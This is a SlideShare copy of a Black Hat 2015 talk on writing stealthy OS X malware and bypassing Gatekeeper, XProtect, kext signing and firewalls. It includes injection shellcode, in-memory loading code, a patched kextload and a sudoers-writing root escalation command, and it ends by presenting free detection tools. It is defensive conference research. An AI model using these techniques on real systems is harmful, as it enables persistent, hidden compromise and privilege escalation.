SlideShare a Scribd company logo

Black Hat '15: Writing Bad @$$ Malware for OS X

Synack
Synack

In comparison to Windows malware, known OS X threats are really quite lame. As an Apple user that has drank the 'Apple Juice,' I didn't think that was fair! From novel persistence techniques, to native OS X components that can be abused to thwart analysis, this talk will detail exactly how to create elegant, bad@ss OS X malware. And since detection is often a death knell for malware, the talk will also show how OS X's native malware mitigations and 3rd-party security tools were bypassed. For example I'll detail how Gatekeeper was remotely bypassed to allow unsigned download code to be executed, how Apple's 'rootpipe' patch was side-stepped to gain root on a fully patched system, and how all popular 3rd-party AV and personal firewall products were generically bypassed by my simple proof-of-concept malware. However, don't throw out your Macs just yet! The talk will conclude by presenting several free security tools that can generically detect or even prevent advanced OS X threats. Armed with such tools, we'll ensure that our computers are better protected against both current and future OS X malware. So unless you work for Apple, come learn how to take your OS X malware skills to the next level and better secure your Mac at the same time!

Technology
1 of 63
Download to read offline
@patrickwardle Writing Bad @$$ Malware for OS X
“leverages the best combination of humans and technology to discover security vulnerabilities in our customers’ web apps, mobile apps, and infrastructure endpoints” WHOIS @patrickwardle    
this talk will cover… OUTLINE overview of os x malware bad @$$ malware defenses }bypassing pspspersistenceinfection self-defense features talk does not cover firmware or kernel-mode OS X malware (see: "Thunderstrike 2: Sith Strike")
OVERVIEW OF OS X MALWARE the status quo
macs are everywhere (home & enterprise) THE RISE OF MACS macs as % of total usa pc sales #3 usa / #5 worldwide vendor in pc shipments percentage 0 3.5 7 10.5 14 year '09 '10 '11 '12 '13 doesn’t  include  iDevices "Mac notebook sales have grown 21% over the last year, while total industry sales have fallen" -apple (3/2015)
but macs don’t get malware…right? MALWARE ON OS X? ‘first’ virus (elk cloner) infected apple II’s last 5 years; ~50 new 
 os x malware families “It doesn’t get PC viruses. A Mac isn’t susceptible to the thousands of viruses plaguing Windows-based computers.” -apple.com (2012) "[2014] nearly 1000 unique attacks on Macs; 25 major families" -kasperksy
__cstring:0000E910
 db  'clipboardd',0
 db  'com.apple.service.clipboardd.plist',0   db  '/Library/LaunchAgents',0     db  '<plist  version="1.0">',0Ah        '<key>RunAtLoad</key>',0Ah   provides reverse shell, keylogging, & screen capture OSX/XSLCMD “a previously unknown variant of the APT backdoor XSLCmd which is designed to compromise Apple OS X systems” -fireeye.com launch agent reverse shell keylogging screen capture OS X 10.9+ crashes
‘standard’ backdoor, providing survey, download/execute, etc. OSX/IWORM #  fs_usage  -­‐w  -­‐f  filesys   20:28:28.727871    open      /Library/LaunchDaemons/com.JavaW.plist                                               20:28:28.727890    write        B=0x16b                                                                                                         launch daemon survey download execute persisting infected torrents launch daemon plist
an iOS infector (via USB) OSX/WIRELURKER } contacts texts launch daemons survey} infected app(s)
 'Maiyadi App Store' infects connected iPhones “a collection of scripts, plists, & binaries all duct-taped together... making it easy to detect.” -j zdziarski
hackingteam's implant; collect all things! OSX/CRISIS (RCSMAC) launch agent rootkit component “There is nothing to be impressed from them from a technical point of view.” -@osxreverser persistence intelligence collection features
the current state of OS X malware THE (KNOWN) STATUS QUO persistence psp bypassself-defense features ‣ well known techniques ‣ majority: launch items ‣ minimal obfuscation ‣ no active self-defense ‣ inelegantly implemented ‣ suffice for the job ‣ no psp awareness ‣ no counter-measures “current OS X malware, while sufficient, is inelegant, amateur, and trivial to detect & prevent”grade: C+ stealth ‣ 'hide' in plain site ‣ stand-alone executables infection ‣ trojans ‣ phishing/old exploits
BAD @$$ OS X MALWARE current malware++
current methods are rather lame INITIAL INFECTION VECTOR(S) fake codecs fake installers/updates infected torrents/apps }protects dumb users Gatekeeper blocking untrusted code somewhat effective, but smart users should be ok.
a far better infection channel INFECTING SOFTWARE DOWNLOADS my dock MitM & infect non-SSL'd internet downloads HTTP :( still need to bypass GateKeeper... ;)
these should be secure, right!? INFECTING AV SOFTWARE DOWNLOADS all the security software I could find, was downloaded over HTTP! LittleSnitch Sophos } ClamXav
current methods are very lame PERSISTANCE launch items } login items persistence methods ‣ well known ‣ easily visible wirelurker's 4(!) launch daemons $  python  knockknock.py   com.apple.MailServiceAgentHelper   path:  /usr/bin/com.apple.MailServiceAgentHelper   com.apple.appstore.PluginHelper   path:  /usr/bin/com.apple.appstore.PluginHelper   periodicdate   path:  /usr/bin/periodicdate
 
 systemkeychain-­‐helper   path:  /usr/bin/systemkeychain-­‐helper MacProtector's login item
fairly stealthy & difficult to disinfect BINARY INFECTION? Process:                  Safari  [1599]   Path:                        Safari.app/Contents/MacOS/Safari   Exception  Type:    EXC_CRASH  (Code  Signature  Invalid)   Exception  Codes:  0x0000000000000000,  0x0000000000000000 OS loader verifies all signatures :( killed by the loader
the crypto seems solid, but what if it was gone? BINARY INFECTION? code signature :) #  md5  Safari.app/Contents/MacOS/Safari  -­‐>                633d043cf9742d6f0787acdee742c10d
 #  unsign.py  Safari.app/Contents/MacOS/Safari
    Safari  code  signature  removed
 
 #  md5  Safari.app/Contents/MacOS/Safari  -­‐>              825edd6a1e3aefa98d7cf99a60bac409
 
 $  open  /Applications/Safari.app  &&  ps  aux  |  grep  Safari      patrick    31337    /Applications/Safari.app  
self-contained somewhat difficult to detect (now), lots of options! PERSISTENCE VIA BINARY INFECTION add new LC_LOAD_DYLIB? hijack entry point? } difficult to disinfect! google 'OS.X/Boubou'
simply plant a dylib to win! DYLIB HIJACKING <blah>.dylib <blah>.dylib "I need <blah>.dylib" app dir "DLL Hijacking on OS X? #@%& Yeah!" DefCon (Sat, Aug 8th)
via Apple's PhotoStreamAgent ('iCloudPhotos.app') DYLIB HIJACKING PERSISTENCE configure hijacker against PhotoFoundation (dylib) copy to /Applications/iPhoto.app/Contents/ Library/LoginItems/PhotoFoundation.framework/ Versions/A/PhotoFoundation $  reboot     $  lsof  -­‐p  <pid  of  PhotoStreamAgent>   /Applications/iPhoto.app/Contents/Library/LoginItems/PhotoFoundation.framework/Versions/A/PhotoFoundation   /Applications/iPhoto.app/Contents/Frameworks/PhotoFoundation.framework/Versions/A/PhotoFoundation PhotoStreamAgent novel no new processes no binary/OS modifications } abuses legitimate functionality of OS X OS X El Capitan still 'hijackable'
currently, essentially non-existent SELF-DEFENSE 'hide' in plain sight } some crypto self-defense methods trivial to find trivial to analyze trivial to disinfect too easy for the AV companies!
abusing OS X's natively supported encryption ENCRYPTED MACH-O BINARIES //load  &  decrypt  segments   load_segment(...){      //decrypt  encrypted  segments      if(scp-­‐>flags  &  SG_PROTECTED_VERSION_1)    unprotect_dsmos_segment(scp-­‐>fileoff,  scp-­‐>filesize,  vp,                                                  pager_offset,  map,  map_addr,  map_size);     }
 //decrypt  chunk   unprotect_dsmos_segment(...){
    //function  pointer  to  decryption  routine      crypt_info.page_decrypt  =  dsmos_page_transform;
    //decrypt
    vm_map_apple_protected(map,  map_addr,  map_addr  +  map_size,  
                                                &crypt_info);
 } ourhardworkbythesewordsguar dedpleasedontsteal(c)AppleC algo: Blowfish (pre 10.6, AES) $  strings  -­‐a  myMalware     applicationDidFinishLaunching:   @"NSString"16@0:8   I  <3  BLACKHAT!   $  ./protect  myMalware    encrypting  'myMalware'   type:  CPU_TYPE_X86_64    encryption  complete   $  strings  -­‐a  myMalware  
 n^jd[P5{Q   r_`EYFaJq07 known malware: ~50% detection drop
tie to a specific target STRONGLY ENCRYPT YOUR MALWARE "environmental key generation towards clueless agents" "[the malware] tied the infection to the specific machine, and meant the payload couldn't be decrypted without knowing the NTFS object ID" 'equation group malware' N: environmental observation
 H: a one way (hash) function M: hash(es) H of observation N, needed for activation, carried by agent
 K: a key //at runtime if H(H(N)) = M then let K := H(N) } intended target any other
IN-MEMORY DECRYPTION & LOADING C&C server } custom in-memory loader? map image load dependencies link OS X supports in-memory loading! local file-system memory custom crypto, requires custom loader
dyld supports in-memory loading/linking IN-MEMORY MACH-O LOADING //vars   NSObjectFileImage  fileImage  =  NULL;   NSModule  module                          =  NULL;   NSSymbol  symbol                          =  NULL;   void  (*function)(const  char  *message);     //have  an  in-­‐memory  (file)  image  of  a  mach-­‐O  file  to  load/link   //  -­‐>note:  memory  must  be  page-­‐aligned  and  alloc'd  via  vm_alloc!
 //create  object  file  image
 NSCreateObjectFileImageFromMemory(codeAddr,  codeSize,  &fileImage);
 //link  module  
 module  =  NSLinkModule(fileImage,  "<anything>",  NSLINKMODULE_OPTION_PRIVATE);   //lookup  exported  symbol  (function)   symbol  =  NSLookupSymbolInModule(module,  "_"  "HelloBlackHat");
 //get  exported  function's  address
 function  =  NSAddressOfSymbol(symbol);
 //invoke  exported  function
 function("thanks  for  being  so  offensive  ;)"); loading a mach-O file from memory sample code released by apple (2005) 'MemoryBasedBundle' stealth++ no longer hosted
unlink dylibs to complicated detection 'HIDING' LOADED LIBRARIES struct  task_dyld_info  {     mach_vm_address_t   all_image_info_addr;       mach_vm_size_t        all_image_info_size;       integer_t                all_image_info_format;         };   struct  dyld_all_image_infos  {     uint32_t             version;         uint32_t             infoArrayCount;       const  struct  dyld_image_info*  infoArray;      ... remove from infoArray decrement infoArrayCount $  unlinkDylib   [+]  injected  into  1337,  unlinked  dylib:  /Users/patrick/hideMe.dylib     
 #  lldb  -­‐p  1337   (lldb)  image  list  |  hideMe.dylib   error:  the  target  has  no  matching  modules loaded dylib data structures to unlink unlinked dylib; hidden from lldb et. al. stealth++
other random ideas SELF DEFENSE prevent deletion? 'complicating' deletion #  chflags  schg  malware.dylib
 #  rm  malware.dylib   rm:  malware.dylib:  Operation  not  permitted "The schg flag can only be unset in single-user mode" self-monitoring? detect local access (dtrace) #  /usr/bin/opensnoop   0    90189  AVSCANNER      malware.dylib virusTotal 0 10 20 30 40 jan feb mar apr may detect detections google adwords? }
getting code into remote processes RUN-TIME PROCESS INJECTION newosxbook.com }mac hacker's handbook run-time injection mach_inject (PPC & i386) x86_64 no x86_64 :( buggy/broken :( (intentionally) at run-time, inject arbitrary dynamic libraries (dylibs) into arbitrary process the goal
determining target process' architecture RUN-TIME PROCESS INJECTION //check  if  remote  process  is  x86_64   BOOL  Is64Bit(pid_t  targetPID)   {          //info  struct          struct  proc_bsdshortinfo  procInfo;                    //get  proc  info          //  -­‐>assumes  valid  pid,  etc          proc_pidinfo(targetPID,  PROC_PIDT_SHORTBSDINFO,                                    0,  &procInfo,  PROC_PIDT_SHORTBSDINFO_SIZE);                    //'pbsi_flags'  has  a  64-­‐bit  mask          return  procInfo.pbsi_flags  &  PROC_FLAG_LP64;   } external process, architecture detection all 64-bit 32 3rd-party 32-bit google drive dropbox vpn apps 64 } }
//remote  library  loading  shellcode  (x86_64)     char  shellCode[]  =    "x90"                                                                                //  nop..    "x55"                                                                                //  pushq    %rbp    "x48x89xe5"                                                                //  movq      %rsp,  %rbp    "x48x83xecx20"                                                        //  subq      $32,  %rsp    "x89x7dxfc"                                                                //  movl      %edi,  -­‐4(%rbp)    "x48x89x75xf0"                                                        //  movq      %rsi,  -­‐16(%rbp)    "xb0x00"                                                                        //  movb      $0,  %al    
  //  call  pthread_set_self      "x48xbfx00x00x00x00x00x00x00x00"        //  movabsq  $0,  %rdi    "x48xb8"  "_PTHRDSS"                                                  //  movabsq  $140735540045793,  %rax    "xffxd0"                                                                        //  callq    *%rax    "x48xbex00x00x00x00x00x00x00x00"        //  movabsq  $0,  %rsi    "x48x8dx3dx2cx00x00x00"                                //  leaq      44(%rip),  %rdi    
  //  dlopen    "x48xb8"  "DLOPEN__"                                                  //  movabsq  $140735516395848,  %rax    "x48xbex00x00x00x00x00x00x00x00"        //  movabsq  $0,  %rsi    "xffxd0"                                                                        //  callq    *%rax        //  sleep(1000000)...    "x48xbfx00xe4x0bx54x02x00x00x00"        //  movabsq  $10000000000,  %rdi    "x48xb8"  "SLEEP___"                                                  //  movabsq  $140735516630165,  %rax    "xffxd0"                                                                        //  callq    *%rax    //  plenty  of  space  for  a  full  path  name  here    "LIBLIBLIBLIB"  "x00x00x00x00x00x00...."; target's process architecture RUN-TIME PROCESS INJECTION www.newosxbook.com 64 }addrs patched in at runtime
getting code into remote processes RUN-TIME PROCESS INJECTION task_for_pid() mach_vm_allocate() thread_create_running()mach_vm_write() vm_protect() task_for_pid() requires r00t
dylib injection (again) ftw! LOAD-TIME PROCESS INJECTION gain automatic & persistent code execution within a process only via a dynamic library hijack }no binary / OS file modifications no process monitoring no complex runtime injection no detection of injection <010>
into Apple's Xcode LOAD-TIME PROCESS INJECTION $  python  dylibHijackScanner.py     
 Xcode  is  vulnerable  (multiple  rpaths)   'binary':                '/Applications/Xcode.app/Contents/MacOS/Xcode'   'importedDylib':  '/DVTFoundation.framework/Versions/A/DVTFoundation'     'LC_RPATH':            '/Applications/Xcode.app/Contents/Frameworks' configure hijacker against DVTFoundation (dylib) copy to /Applications/Xcode.app/Contents/ Frameworks/DVTFoundation.framework/Versions/A/ do you trust your compiler now!? 
 (k thompson) Xcode
...starting with Apple's BYPASSING SECURITY PRODUCTS/TECHNOLOGIES xprotectgatekeeper os x sandbox code-signing ‘wins’ < so we’re all safe now, right?!? nope! }
allowing unsigned code to execute BYPASSING GATEKEEPER circumvent gatekeeper's draconic blockage via a dynamic library hijack the goal bypass this? gatekeeper in action
all files with quarantine attribute are checked HOW GATEKEEPER WORKS quarantine attributes //attributes   $  xattr  -­‐l  ~/Downloads/malware.dmg        com.apple.quarantine:0001;534e3038;      Safari;  B8E3DA59-­‐32F6-­‐4580-­‐8AB3...   safari, etc. tags downloaded content "Gatekeeper is an anti-malware feature of the OS X operating system. It allows users to restrict which sources they can install applications from, in order to reduce the likelihood of executing a Trojan horse" -apple.com
go home gatekeeper, you are drunk! GATEKEEPER BYPASS find an -signed or 'mac app store' app that contains an external relative reference to a hijackable dylib create a .dmg with the necessary folder structure to contain the malicious dylib in the externally referenced location #winning verified, so can't modify .dmg/.zip layout (signed) application <external>.dylib gatekeeper only verifies the app bundle!! not verified!
#winning GATEKEEPER BYPASS gatekeeper setting's (maximum) gatekeeper bypass :) unsigned (non-Mac App Store) code execution!! CVE 2015-3715 patched in OS X 10.10.4 standard alert still can bypass ;)
avoiding detection BYPASSING XPROTECT circumvent XProtect's malware detection so that malware can run in an uninhibited manner the goal bypass this? XProtect in action (flagging iWorm)
apple's built-in AV product is weak sauce BYPASSING XPROTECT XProtect signature file (iWorm) name hash file name } bypasses recompile write new ...or just rename!
decently secure, but lots of OS X bugs! ESCAPING THE OS X SANDBOX escape from the OS X sandbox to so that our malicious code can perform malicious actions. the goal user data system resources app sandboxed app 20+ bugs that could bypass the sandbox (‘project zero’) "Unauthorized Cross-App Resource Access on Mac OS X & iOS" [ bypasses ]
allowing unsigned kext to load BYPASSING KERNEL-MODE CODE SIGNING load malicious unsigned kexts into the kernel the goal bypass this? OS X kernel-mode signing checks
directly interface with the kernel BYPASSING KERNEL-MODE CODE SIGNING //unload  kext  daemon   #  launchctl  unload  /System/Library/LaunchDaemons/com.apple.kextd.plist   //load  (unsigned)  driver  with  custom  kext_load   #  ./patchedKextload  -­‐v  unsigned.kext
    Can't  contact  kextd;  attempting  to  load  directly  into  kernel   //profit  :)   #  kextstat  |  grep  -­‐i  unsigned      138        0  0xffffff7f82eeb000    com.synack.unsigned unsigned kext loading download kext_tools patch & recompile kextload loadKextsIntoKernel(KextloadArgs  *  toolArgs)
 {
    //sigResult  =  checkKextSignature(theKext,  0x1,  earlyBoot);      //always  OK!      sigResult  =  0;   } patched kextload
rootpipe reborn & more! NEED ROOT? copy Directory Utility to /tmp to get write permissions copy plugin (.daplugin) into Directory Utility's internal plugin directory execute Directory Utility evil plugin payload WriteConfig XPC service Dir. Utility $  ls  -­‐lart  /private/tmp   drwxr-­‐xr-­‐x    patrick    wheel      Directory  Utility.app "Stick That In Your (root)Pipe & Smoke It" 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s or, another bug (Stefan Esser) unpatched!
...and the rest (equally lame) BYPASSING SECURITY PRODUCTS LittleSnitch Sophos ClamXav } bypasses recompile write new behavioral based (firewall)
abusing trust to access the network BYPASSING LITTLESNITCH generically bypass LittleSnitch to allow malicious code to access the network in an uninhibited manner? the goal bypass this? LittleSnitch in action
load-time 'injection' into a trusted process LITTLE SNITCH BYPASS 0X1 $  python  dylibHijackScanner.py     
 GPG  Keychain  is  vulnerable  (weak/rpath'd  dylib)   'binary':                '/Applications/GPG  Keychain.app/Contents/MacOS/GPG  Keychain'   'weak  dylib':        '/Libmacgpg.framework/Versions/B/Libmacgpg'     'LC_RPATH':            '/Applications/GPG  Keychain.app/Contents/Frameworks' GPG Keychain LittleSnitch rule for GPG Keychain got 99 problems but LittleSnitch ain't one ;)
more generically, via iCloud LITTLE SNITCH BYPASS 0X2 iCloud un-deletable system rule: "anybody can talk to iCloud" LittleSnitch's iCloud rule o rly!?...yes!
putting some pieces all together SIMPLE END-TO-END ATTACK persist exfil file download & execute cmd persistently install a malicious dylib as a hijacker upload a file ('topSecret') to a remote iCloud account download and run a command ('Calculator.app') doesn't require r00t!
ClamXav LittleSnitch Sophos the AV industry vs me ;) PSP TESTING are these blocked? persist exfil file download & execute cmd OS X 'security' products
DEFENSE free os x security tools
MY CONUNDRUM …I love my mac, but it's so easy to hack "No one is going to provide you a quality service for nothing. If you’re not paying, you’re the product." -unnamed AV company ha, BULLSHIT! + I should write some OS X security tools to protect my Mac ....and share 'em freely :)
free OS X tools & malware samples OBJECTIVE-SEE malware samples :) KnockKnock BlockBlock TaskExplorer
KNOCKKNOCK UI detecting persistence: now an app for that! KnockKnock (UI)
KNOCKKNOCK UI VirusTotal integration detect submit rescan results VirusTotal integrations
BLOCKBLOCK a 'firewall' for persistence locations status bar BlockBlock, block blocking :) HackingTeam's OS X implant "0-day bug hijacks Macs" (payload)
TASKEXPLORER explore all running tasks (processes) '#' filters signing virus total dylibs files network
EL CAPITAN (OS X 10.11) next version of OS X to keep us all safe? System  Integrity  Protection
 "A  new  security  policy  that  applies  to  every  running  process,  including   privileged  code  and  code  that  runs  out  of  the  sandbox.  The  policy  extends   additional  protections  to  components  on  disk  and  at  run-­‐time,  only   allowing  system  binaries  to  be  modified  by  the  system  installer  and   software  updates.  Code  injection  and  runtime  attachments  to  system   binaries  are  no  longer  permitted."  -­‐apple.com "rootless" iWorm vs. OS X 10.11 (beta 5)"wut!?" the test:
CONCLUSIONS some key takeaways... bypassing pspspersistenceinfection self-defense features improve the malwarez current OS X malware is lame; leading to complacent security products! think differently
QUESTIONS & ANSWERS patrick@synack.com @patrickwardle feel free to contact me any time! "What if every country has ninjas, but we only know about the Japanese ones because they’re rubbish?" -DJ-2000, reddit.com final thought ;) "Objective-See's OS X Security Tools" Blackhat Arsenal (tomorrow, 15:30 - 18:00) syn.ac/BlackhatMalware
credits - thezooom.com - deviantart.net - iconmonstr.com - flaticon.com images - @osxreverser - http://reverse.put.as/Hitcon_2012_Presentation.pdf - https://www.syscan.org/index.php/download/get/9ee8ed70ddcb2d53169b2420f2fa286e/ SyScan15%20Pedro%20Vilaca%20-%20BadXNU%20a%20rotten%20apple - https://reverse.put.as/2013/11/23/breaking-os-x-signed-kernel-extensions-with-a-nop/
 - www.newosxbook.com - mac hacker's handbook talks/books

Recommended

Ossec Lightning
Ossec LightningOssec Lightning
Ossec Lightningwremes
 
Cybercamp17 Threat Intelligence - Desde qué es hasta cómo lo hago
Cybercamp17 Threat Intelligence - Desde qué es hasta cómo lo hagoCybercamp17 Threat Intelligence - Desde qué es hasta cómo lo hago
Cybercamp17 Threat Intelligence - Desde qué es hasta cómo lo hagoWiktor Nykiel ✔
 
App center analyticsを使い倒そう
App center analyticsを使い倒そうApp center analyticsを使い倒そう
App center analyticsを使い倒そうAtsushi Nakamura
 
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...Mauricio Velazco
 
Why we love ArangoDB. The hunt for the right NosQL Database
Why we love ArangoDB. The hunt for the right NosQL DatabaseWhy we love ArangoDB. The hunt for the right NosQL Database
Why we love ArangoDB. The hunt for the right NosQL DatabaseAndreas Jung
 
SANS 20 Kritik Siber Guvenlik Kontrolü
SANS 20 Kritik Siber Guvenlik KontrolüSANS 20 Kritik Siber Guvenlik Kontrolü
SANS 20 Kritik Siber Guvenlik KontrolüSparta Bilişim
 
Security Analyst Workshop - 20190314
Security Analyst Workshop - 20190314Security Analyst Workshop - 20190314
Security Analyst Workshop - 20190314Florian Roth
 
Design Confidence | Designship 2018
Design Confidence | Designship 2018Design Confidence | Designship 2018
Design Confidence | Designship 2018Atsushi HASEGAWA, Ph.D.
 

Recommended

Ossec Lightning
Ossec LightningOssec Lightning
Ossec Lightningwremes
 
Cybercamp17 Threat Intelligence - Desde qué es hasta cómo lo hago
Cybercamp17 Threat Intelligence - Desde qué es hasta cómo lo hagoCybercamp17 Threat Intelligence - Desde qué es hasta cómo lo hago
Cybercamp17 Threat Intelligence - Desde qué es hasta cómo lo hagoWiktor Nykiel ✔
 
App center analyticsを使い倒そう
App center analyticsを使い倒そうApp center analyticsを使い倒そう
App center analyticsを使い倒そうAtsushi Nakamura
 
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...Mauricio Velazco
 
Why we love ArangoDB. The hunt for the right NosQL Database
Why we love ArangoDB. The hunt for the right NosQL DatabaseWhy we love ArangoDB. The hunt for the right NosQL Database
Why we love ArangoDB. The hunt for the right NosQL DatabaseAndreas Jung
 
SANS 20 Kritik Siber Guvenlik Kontrolü
SANS 20 Kritik Siber Guvenlik KontrolüSANS 20 Kritik Siber Guvenlik Kontrolü
SANS 20 Kritik Siber Guvenlik KontrolüSparta Bilişim
 
Security Analyst Workshop - 20190314
Security Analyst Workshop - 20190314Security Analyst Workshop - 20190314
Security Analyst Workshop - 20190314Florian Roth
 
Design Confidence | Designship 2018
Design Confidence | Designship 2018Design Confidence | Designship 2018
Design Confidence | Designship 2018Atsushi HASEGAWA, Ph.D.
 
SQLアンチパターン読書会 4章 キーレスエンエントリ(外部キー嫌い)
SQLアンチパターン読書会 4章 キーレスエンエントリ(外部キー嫌い)SQLアンチパターン読書会 4章 キーレスエンエントリ(外部キー嫌い)
SQLアンチパターン読書会 4章 キーレスエンエントリ(外部キー嫌い)makopi 23
 
SQLアンチパターン~スパゲッティクエリ
SQLアンチパターン~スパゲッティクエリSQLアンチパターン~スパゲッティクエリ
SQLアンチパターン~スパゲッティクエリItabashi Masayuki
 
Part 0: 製造リファレンス・アーキテクチャとは?(製造リファレンス・アーキテクチャ勉強会)
Part 0: 製造リファレンス・アーキテクチャとは?(製造リファレンス・アーキテクチャ勉強会)Part 0: 製造リファレンス・アーキテクチャとは?(製造リファレンス・アーキテクチャ勉強会)
Part 0: 製造リファレンス・アーキテクチャとは?(製造リファレンス・アーキテクチャ勉強会)Takeshi Fukuhara
 
ドメイン駆動設計 コアドメインを語り合ってみよう
ドメイン駆動設計 コアドメインを語り合ってみようドメイン駆動設計 コアドメインを語り合ってみよう
ドメイン駆動設計 コアドメインを語り合ってみよう増田 亨
 
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıSiber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıBGA Cyber Security
 
Selenideを使って上司のよくある勘違いを回避するお話
Selenideを使って上司のよくある勘違いを回避するお話Selenideを使って上司のよくある勘違いを回避するお話
Selenideを使って上司のよくある勘違いを回避するお話ceres-inc
 
Using Wardley Maps to Understand Security's Landscape and Strategy
Using Wardley Maps to Understand Security's Landscape and StrategyUsing Wardley Maps to Understand Security's Landscape and Strategy
Using Wardley Maps to Understand Security's Landscape and StrategyDinis Cruz
 
オントロジー工学に基づくセマンティック技術(1)オントロジー工学入門
オントロジー工学に基づくセマンティック技術(1)オントロジー工学入門オントロジー工学に基づくセマンティック技術(1)オントロジー工学入門
オントロジー工学に基づくセマンティック技術(1)オントロジー工学入門Kouji Kozaki
 
Designing Puppet: Roles/Profiles Pattern
Designing Puppet: Roles/Profiles PatternDesigning Puppet: Roles/Profiles Pattern
Designing Puppet: Roles/Profiles PatternPuppet
 
情報共有から始めるチーム開発とキャリア戦略
情報共有から始めるチーム開発とキャリア戦略情報共有から始めるチーム開発とキャリア戦略
情報共有から始めるチーム開発とキャリア戦略Takuya Oikawa
 
Splunk Enterpise for Information Security Hands-On
Splunk Enterpise for Information Security Hands-OnSplunk Enterpise for Information Security Hands-On
Splunk Enterpise for Information Security Hands-OnSplunk
 
ビッグデータ処理データベースの全体像と使い分け
2018年version
ビッグデータ処理データベースの全体像と使い分け
2018年versionビッグデータ処理データベースの全体像と使い分け
2018年version
ビッグデータ処理データベースの全体像と使い分け
2018年versionTetsutaro Watanabe
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with SplunkSplunk
 
xOps: エンジニアがスタートアップの成長の原動力となる日
xOps: エンジニアがスタートアップの成長の原動力となる日xOps: エンジニアがスタートアップの成長の原動力となる日
xOps: エンジニアがスタートアップの成長の原動力となる日Takaaki Umada
 
SHODAN search Engine
SHODAN search EngineSHODAN search Engine
SHODAN search EngineYash Diwakar
 
立教大学MBA:AIの最先端技術によるこれからの価値創造
立教大学MBA:AIの最先端技術によるこれからの価値創造立教大学MBA:AIの最先端技術によるこれからの価値創造
立教大学MBA:AIの最先端技術によるこれからの価値創造Osaka University
 
Technology stack of social networks [MTS]
Technology stack of social networks [MTS]Technology stack of social networks [MTS]
Technology stack of social networks [MTS]philmaweb
 
Application development with c#, .net 6, blazor web assembly, asp.net web api...
Application development with c#, .net 6, blazor web assembly, asp.net web api...Application development with c#, .net 6, blazor web assembly, asp.net web api...
Application development with c#, .net 6, blazor web assembly, asp.net web api...Shotaro Suzuki
 
2015-10-31 クラウドネイティヴ時代の運用を考える 〜 ドキュメント駆動運用へ
2015-10-31 クラウドネイティヴ時代の運用を考える 〜 ドキュメント駆動運用へ2015-10-31 クラウドネイティヴ時代の運用を考える 〜 ドキュメント駆動運用へ
2015-10-31 クラウドネイティヴ時代の運用を考える 〜 ドキュメント駆動運用へOperation Lab, LLC.
 
Building a Consistent Hybrid Cloud Semantic Model In Denodo
Building a Consistent Hybrid Cloud Semantic Model In DenodoBuilding a Consistent Hybrid Cloud Semantic Model In Denodo
Building a Consistent Hybrid Cloud Semantic Model In DenodoDenodo
 
DLL Hijacking on OS X
DLL Hijacking on OS XDLL Hijacking on OS X
DLL Hijacking on OS XSynack
 
Virus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperVirus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperSynack
 

More Related Content

What's hot

SQLアンチパターン読書会 4章 キーレスエンエントリ(外部キー嫌い)
SQLアンチパターン読書会 4章 キーレスエンエントリ(外部キー嫌い)SQLアンチパターン読書会 4章 キーレスエンエントリ(外部キー嫌い)
SQLアンチパターン読書会 4章 キーレスエンエントリ(外部キー嫌い)makopi 23
 
SQLアンチパターン~スパゲッティクエリ
SQLアンチパターン~スパゲッティクエリSQLアンチパターン~スパゲッティクエリ
SQLアンチパターン~スパゲッティクエリItabashi Masayuki
 
Part 0: 製造リファレンス・アーキテクチャとは?(製造リファレンス・アーキテクチャ勉強会)
Part 0: 製造リファレンス・アーキテクチャとは?(製造リファレンス・アーキテクチャ勉強会)Part 0: 製造リファレンス・アーキテクチャとは?(製造リファレンス・アーキテクチャ勉強会)
Part 0: 製造リファレンス・アーキテクチャとは?(製造リファレンス・アーキテクチャ勉強会)Takeshi Fukuhara
 
ドメイン駆動設計 コアドメインを語り合ってみよう
ドメイン駆動設計 コアドメインを語り合ってみようドメイン駆動設計 コアドメインを語り合ってみよう
ドメイン駆動設計 コアドメインを語り合ってみよう増田 亨
 
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıSiber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıBGA Cyber Security
 
Selenideを使って上司のよくある勘違いを回避するお話
Selenideを使って上司のよくある勘違いを回避するお話Selenideを使って上司のよくある勘違いを回避するお話
Selenideを使って上司のよくある勘違いを回避するお話ceres-inc
 
Using Wardley Maps to Understand Security's Landscape and Strategy
Using Wardley Maps to Understand Security's Landscape and StrategyUsing Wardley Maps to Understand Security's Landscape and Strategy
Using Wardley Maps to Understand Security's Landscape and StrategyDinis Cruz
 
オントロジー工学に基づくセマンティック技術(1)オントロジー工学入門
オントロジー工学に基づくセマンティック技術(1)オントロジー工学入門オントロジー工学に基づくセマンティック技術(1)オントロジー工学入門
オントロジー工学に基づくセマンティック技術(1)オントロジー工学入門Kouji Kozaki
 
Designing Puppet: Roles/Profiles Pattern
Designing Puppet: Roles/Profiles PatternDesigning Puppet: Roles/Profiles Pattern
Designing Puppet: Roles/Profiles PatternPuppet
 
情報共有から始めるチーム開発とキャリア戦略
情報共有から始めるチーム開発とキャリア戦略情報共有から始めるチーム開発とキャリア戦略
情報共有から始めるチーム開発とキャリア戦略Takuya Oikawa
 
Splunk Enterpise for Information Security Hands-On
